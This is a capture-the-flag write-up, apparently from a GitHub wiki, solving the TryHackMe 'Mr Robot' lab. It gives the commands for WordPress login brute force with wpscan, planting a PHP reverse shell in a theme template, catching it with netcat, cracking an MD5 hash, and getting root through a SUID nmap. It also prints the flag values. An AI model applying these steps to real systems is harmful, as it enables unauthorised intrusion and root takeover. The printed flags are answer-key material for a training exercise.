Mr_Robot_CTF writeup - 5skr0ll3r/Try_Hack

Mr_Robot_CTF

Flag1

Starting this ctf with an nmap scan:

nmap -A -sV -vv -T5 --script vuln <ip>

-A agresive scan

-sV services versions detection

-vv very verbose

-T5 Set timing max level

--script vuln runs a script that looks for known vulnerabilities

Checking robots.txt we find 2 files: fsocity.dic key-1-of-3.txt

flag 1: http://<machine_ip>/key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

Flag2

File fsocity.dic found in `http://<machine_ip>/fsocity.dic` is a wordlist and using wpscan we can brute force the login page found with the nmap scan:

http://<ip>:80/wp-login.php

If you open fsocity.dic you will notice that the file has too many lines and some of them are duplicates, to fix this (with some help from stackoverflow) i made a python program that removes all duplicates

outfile = 'newp.txt'

lines_seen = set()

outfile = open(outfile, 'w')

for line in open('fsocity.dic','r'):

    if line not in lines_seen:

        outfile.write(line)

        lines_seen.add(line)

outfile.close()

Run it: python3 <name_of the_file> As wordlist now, use newp.txt

We gonna guess the name elliot cause why not or use the newp.txt as the name_list and the pass_list (it might take a while): wpscan --url <http://<ip>:80/wp-login.php> -U <name_list> -P <pass_list>

Creds: Name: elliot Pass:ER28-0652

After logging in, go in Appearance > Editor > 404 Template:

Delete code and put shell code, i used: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

In the code, change the ip to your ip and the port number to 4444

Start NetCat Listener:

nc -lnvp <port_used_in_shell>

and go to:

http://<ip>:80/wp_admin/404.php

And you have a shell

Going in home/robot/ we see 2 files we dont have permision to see the flag but we can see the password.raw-md5that contains: robot:c3fcd3d76192e4007dfb496cca67e13b

Copy the hash and go to https://crackstation.net/ to crack it. Cracked_Hash: abcdefghijklmnopqrstuvwxyz

Once you have the pass try: su robot

As a result we get: su: must be run from a terminal

Do: python -c 'import pty; pty.spawn("/bin/bash")'

And now retry su robot

Cat the file in /home/robot/: 822c73956184f694993bede3eb39f959 and you have the second flag

Flag3

For the last flag as the hint is nmap i supose we can escalate our privileges using it to get root access:

find / -user root -perm -4000 -exec ls -la {} \;

/ directory starting the search

-user root files with owner root

-perm -4000 files with permisions set to 4000

-exec ls -la executing command ls -la to see more info about the displayed files

In one of the results we find the following: -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap It has x permision for any user meaning we can run it

so by doing: nmap --interactive we execute commands from nmap, which nmap has root privileges

do: !sh Now you can navigate to the root directory and cat key-3-of-3.txt: 04787ddef27c3dee1ee161b21670b4e4

Mr_Robot_CTF writeup - 5skr0ll3r/Try_Hack_Me GitHub Wiki

Flag1

Starting this ctf with an nmap scan:

Flag2

File fsocity.dic found in `http://<machine_ip>/fsocity.dic` is a wordlist and using wpscan we can brute force the login page found with the nmap scan:

Start NetCat Listener:

Flag3

For the last flag as the hint is nmap i supose we can escalate our privileges using it to get root access:

⚠️ GitHub.com Fallback ⚠️

Mr_Robot_CTF writeup - 5skr0ll3r/Try_Hack_Me GitHub Wiki

Flag1

Starting this ctf with an nmap scan:

Flag2

File fsocity.dic found in http://<machine_ip>/fsocity.dic is a wordlist and using wpscan we can brute force the login page found with the nmap scan:

Start NetCat Listener:

Flag3

For the last flag as the hint is nmap i supose we can escalate our privileges using it to get root access:

⚠️ **GitHub.com Fallback** ⚠️

File fsocity.dic found in `http://<machine_ip>/fsocity.dic` is a wordlist and using wpscan we can brute force the login page found with the nmap scan:

⚠️ GitHub.com Fallback ⚠️